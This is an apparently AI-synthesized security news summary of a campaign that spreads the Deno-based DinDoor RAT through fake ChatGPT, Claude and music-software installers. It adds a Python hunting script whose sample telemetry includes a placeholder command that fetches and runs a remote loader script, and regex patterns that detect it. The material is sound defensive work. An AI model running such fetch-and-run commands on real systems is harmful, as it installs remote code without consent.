VYPR Research · Published May 26, 2026 · 1 source

Fake Software on GitHub and SourceForge Distributes Deno-Based DinDoor RAT

Malwarebytes uncovers a campaign using fake installers for ChatGPT, Claude, and other software on GitHub and SourceForge to deliver the DinDoor RAT, which leverages the Deno runtime for stealth.

Malwarebytes researchers have identified a widespread malware campaign that distributes fake installers for popular software such as ChatGPT, Claude, AutoTune, and Kontakt through GitHub and SourceForge repositories. The malicious packages deliver a Deno-based backdoor called DinDoor, which ultimately deploys a remote access Trojan (RAT) capable of data exfiltration from browsers and cryptocurrency wallets.

The infection chain begins with compromised YouTube channels that promote fake software, directing viewers to malicious GitHub or SourceForge repositories. These repositories host MSI files or PowerShell scripts that, when executed, install the Deno JavaScript runtime via package managers like Scoop or WinGet. Deno is then used to execute the DinDoor RAT, which features a peer-to-peer communication mechanism that hides malicious traffic through Microsoft Edge.
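The chain above (installer or PowerShell script, package manager pulling in Deno, then deno.exe launching the payload) leaves a recognisable sequence in endpoint process-creation telemetry. The following hunt is an added example written for this summary; it is not code from Malwarebytes, Vypr, or the DinDoor operators. It assumes Sysmon-style process-creation records with parent image, image and command line, and all sample events, hostnames, paths and URLs are constructed placeholders.

```python
"""Hunt for the DinDoor-style install chain in process-creation telemetry.

Signals, per the reported chain:
  1. scoop/winget invoked to install Deno;
  2. deno.exe launched by an installer or shell (msiexec/powershell/cmd);
  3. deno.exe running a script fetched from a remote URL.
A host where (1) is followed by (2) or (3) inside a short window is rated high.
"""
import re
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass(frozen=True)
class ProcEvent:
    ts: str            # ISO-8601 timestamp (assumed field layout)
    host: str
    parent_image: str  # parent process image name
    image: str         # process image name
    cmdline: str


# Constructed sample telemetry, not real events from the report.
SAMPLE_EVENTS = [
    ProcEvent("2026-05-20T10:01:00", "WS01", "explorer.exe", "msiexec.exe",
              'msiexec.exe /i "C:\\Users\\u\\Downloads\\ChatGPT-Setup.msi" /qn'),
    ProcEvent("2026-05-20T10:01:05", "WS01", "msiexec.exe", "powershell.exe",
              'powershell.exe -c "scoop install deno"'),
    ProcEvent("2026-05-20T10:02:10", "WS01", "powershell.exe", "deno.exe",
              "deno.exe run -A https://example.invalid/loader.js"),
    ProcEvent("2026-05-20T11:00:00", "DEV02", "explorer.exe", "winget.exe",
              "winget install deno"),
    ProcEvent("2026-05-20T11:30:00", "DEV02", "code.exe", "deno.exe",
              "deno.exe run --allow-net main.ts"),   # benign developer use
    ProcEvent("2026-05-20T12:00:00", "WS03", "explorer.exe", "msedge.exe",
              "msedge.exe --profile-directory=Default"),
]

INSTALL_RE = re.compile(r"\b(scoop|winget)\b.*\binstall\b.*\bdeno\b", re.I)
REMOTE_SCRIPT_RE = re.compile(r"\bdeno(\.exe)?\s+run\b.*\bhttps?://", re.I)
INSTALLER_OR_SHELL = {"msiexec.exe", "powershell.exe", "pwsh.exe", "cmd.exe"}
INSTALL_TAG = "deno_install_via_pkgmgr"


def classify(ev: ProcEvent) -> list[str]:
    """Return the detection tags that apply to a single event."""
    tags = []
    if INSTALL_RE.search(ev.cmdline):
        tags.append(INSTALL_TAG)
    if ev.image.lower() == "deno.exe":
        if ev.parent_image.lower() in INSTALLER_OR_SHELL:
            tags.append("deno_spawned_by_installer_or_shell")
        if REMOTE_SCRIPT_RE.search(ev.cmdline):
            tags.append("deno_runs_remote_script")
    return tags


def hunt(events, window: timedelta = timedelta(minutes=30)) -> list[dict]:
    """Correlate per host: a Deno install followed by a flagged deno.exe
    launch within `window` is high; a flagged launch alone is medium;
    an install alone is low. Unflagged events produce nothing."""
    findings = []
    last_install: dict[str, datetime] = {}
    for ev in sorted(events, key=lambda e: e.ts):
        tags = classify(ev)
        if not tags:
            continue
        t = datetime.fromisoformat(ev.ts)
        if INSTALL_TAG in tags:
            last_install[ev.host] = t
        exec_tags = [x for x in tags if x != INSTALL_TAG]
        if exec_tags:
            inst = last_install.get(ev.host)
            severity = "high" if inst is not None and t - inst <= window else "medium"
            findings.append({"host": ev.host, "ts": ev.ts,
                             "severity": severity, "tags": exec_tags})
        else:
            findings.append({"host": ev.host, "ts": ev.ts,
                             "severity": "low", "tags": tags})
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f["severity"].upper(), f["host"], f["ts"], ", ".join(f["tags"]))
```

On the constructed sample, WS01 is rated high (install followed within minutes by deno.exe spawned from PowerShell running a remote script), while DEV02's winget install is only a low-severity note because the later deno.exe run comes from an editor with a local script. The parent-process check is what separates the installer chain from ordinary developer use, so tune `INSTALLER_OR_SHELL` and the window to the environment rather than alerting on deno.exe alone.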

The campaign has accumulated over 50,000 video views, targeting creators, AI enthusiasts, gamers, and technically inclined users who are more likely to download unofficial tools or cracked software. The fake repositories often ask users to copy and run a command in the terminal, which downloads and executes the malicious MSI. Malwarebytes observed multiple repositories impersonating legitimate software, including ZENOLOGY, Ableton Live, and GearUP.

Once installed, the DinDoor RAT can execute additional payloads, steal credentials and session cookies from browsers, and exfiltrate data from cryptocurrency wallets. The use of Deno, an alternative JavaScript runtime, helps the malware evade traditional detection methods that focus on Node.js or PowerShell-based threats. This technique mirrors recent trends where attackers abuse Bun and Deno to bypass security controls.

Malwarebytes reported the malicious repositories to GitHub, which quickly removed them. However, attackers are expected to create new accounts and repositories to continue the campaign. Users are advised to download software only from official vendor websites, avoid cracked or unofficial versions, and carefully inspect repository profiles and file signatures before execution.

The DinDoor campaign highlights the growing abuse of legitimate development platforms like GitHub and SourceForge for malware distribution. By leveraging trusted infrastructure and alternative runtimes, attackers increase the credibility of their lures and reduce the likelihood of detection. Organizations and individuals should remain vigilant and implement strict download policies to mitigate such threats.

Synthesized by Vypr AI